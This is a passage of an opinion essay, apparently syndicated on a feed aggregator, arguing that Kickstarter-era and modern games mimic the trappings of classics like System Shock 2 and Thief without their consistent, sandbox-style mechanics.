I think this kind of game design stems from a fundamental misunderstanding, willful or not, of how games are supposed to work. It's cargo culting the patterns of games and game mechanics, without considering what they're for. Which is the point I'd like to get to.

But first, there's still the elephant.

Crowdfunding
Star Citizen
Double Fine Adventure Kickstarter
Double Fine Adventure

See, the way these shady free-to-play games work... if we're honest, it kinda matches how Kickstarter plays out. Dramatic concept art. A beloved NPC in need. An XP bar to fill. Stretch goals to level up. Massive online multiplayer with social media tie ins, rally your friends. Plus of course, unlimited alpha and beta testing until release, bankrolled by you, with additional paid perks along the way.

With the risk of stating the obvious, but it's more on point than ever: these things are run by game designers, for gamers. No, put away the tin foil hat. I simply want to suggest that what draws people into these projects bears little relation to what comes out at the end, a release which is merely a coda to a multi-year event. That it is no more about game development than Mario is about saving princesses. That maybe Kickstarter is a sequel to Twitter, the world's #1 video game.

It shows in the lack of polish and sophistication in the games that do manage a release, which reviewers and fans consistently gloss over or forgive. Yes I'm getting into taste territory here, but let's look at it objectively. Repetitive shoot em ups that merely consist of dice rolls and numbers going up. RPGs with fenced off wax-museum towns. Meticulously painted backdrops that belie the lack of depth. Or alternatively, pixel art and chiptunes.

Indies
Wasteland 2, Shadowrun Returns, Broken Age, Superbrothers: Sword & Sworcery EP

On the surface these games have all the trappings of the classic gaming age, remade in widescreen HD or quirky indie glory, but they lack lasting power once you stop playing. Far from evolving the real classics, of which there are admittedly not actually that many, we've regressed and turned them into caricatures of themselves, mistaking technical limitations for a lack of ambition.

The Carrot and the Stick

If at this point you think I'm wearing rose-tinted glasses so fabulous I'm farting rainbows, allow me to convince you otherwise. I'm not pretending that classic DOS or NES games with giant clunky controls were the height of interaction design, or that early 3D wasn't butt-ugly in retrospect. Features like hint systems and autosaves are nice. Rather, there's a reason people continue to cite the same few classics.

Fallout, Freespace, Outcast, Master of Orion, Rollercoaster Tycoon, System Shock, Thief and Torment are still high points in gaming, and it isn't because they were/weren't Art, or are/aren't crappy by modern standards.

To this day, each of those games presents an understandable, flexible sandbox. They offer you a world with consistent rules, letting you figure out the mechanics to face the game's challenges your way. You explore environments at your own pace, build at your leisure, and you're driven forward because you want to, not because you have to. Compulsion is a side-effect of existing motivations, which naturally result from actively participating in the game world.

Classics
Fallout, Outcast, Freespace 2, System Shock 2, Thief 2: The Metal Age

If I go through an airlock in System Shock 2, it's because I need what's on the other side of it, and I hope to return alive from it. The game presents a choice and then dares me to take it.

If I go through an airlock in Mass Effect 3, it closes permanently because everything looks the same and too many players got turned around in testing. There is never a reason to go back. The game presents a mistaken illusion of freedom and has to clamp down to fix it.

Corridor shooters with random chest high barriers, indestructible plot armor, keys hanging next to locks, breadcrumbed objective markers, one-way quick travel or chutes, rock-paper-scissors busywork, teleporting AI... these are all just symptoms of a broken game world, which needs dramatic patch jobs to make basic gameplay not fall apart. If a level designer locks a door with the Red Key, they're just putting a meaningless fetch quest in your path to keep you busy. If they put two elite guards and an alarm there instead, now you have the opportunity for improvisation and consequence. That can only happen when there's options beyond "Use Shotgun on Face" and you've been given space and time to get confident about it.

Instead, many games are explicitly structured in a linear, inflationary manner. What you do at level 50 is mostly the same as level 5, only now the numbers are 10× larger, and you shoot blue instead of green.

Classics
The Elder Scrolls IV: Oblivion

The role of game mechanics should not be the oppressive tyrant telling you to fetch and grind and be thankful for your crumbs of XP and DPS as the scenery blazes past. It should be an à-la-carte menu of options which is opened up for your benefit and at your direction. Slow enough that you can get familiar with each element in turn, but fast enough not to frustrate and limit. Unlockables and crafting should be a way to enable new abilities, not just busywork. Level ups should let you specialize in certain tactics, not just keep up with the Joneses who all bought new glass armor and plasma rifles overnight. Compulsion is just a stick, not the carrot.

Ironically I think it's the technical limitations of classic games that often played to their advantage and which modern remakes in particular are screwing up. The spartan graphics served to highlight the mechanics, instead of needing focus rings and prompts. The lack of voices and mocap forced the writing to carry the story. When you can't conjure up massive vistas at will, there's no point in making the player cross giant cities and wastelands. When the entire world is just isometric sprites, it's practical to let the player destroy all of them. For a while there was a really good match between the complexity of the game world and the way it was represented, and I don't think it's a coincidence that this window is where we find many beloved gaming classics.

What might now seem like broken mechanics often had significant effects on gameplay. An amnesiac guard that can't climb ladders has a similar effect as regenerating health: it makes it easier to run away. Except only one of those requires the player to learn their surroundings. Circle strafers had a surprising amount of non-linearity and involved much more acrobatics than FPSes today, and the passive AI of early RTSes acts similar to modern shooter enemies, which don't engage unless you've spotted them.

Classic games
Crusader: No Regret, Rollercoaster Tycoon, TIE Fighter, Carmageddon

Gaming is ultimately about forgetting the rules of reality and adopting a whole new set. Realism doesn't matter, whacky rules can be fun, as long as they're consistent and interact in interesting ways.

For modern games to evolve to match their now deceiving superstar looks, to move beyond progress bar quest and animated puppets with voice boxes, significant advances have to be made. We need real sandbox simulation, autonomous agents and language-capable AI, and it's not as easy to deliver as another sequel or reboot, mainstream or otherwise. It requires building a game that's meant to be played rather than just reacted to.

I just hope enough people remember what actually made the classics work.

21 Sep 2014 7:00am GMT

20 Sep 2014

feedPlanet Grep

Dieter Plaetinck: Graphite & Influxdb intermezzo: migrating old data and a more powerful carbon relay


read more

20 Sep 2014 7:18pm GMT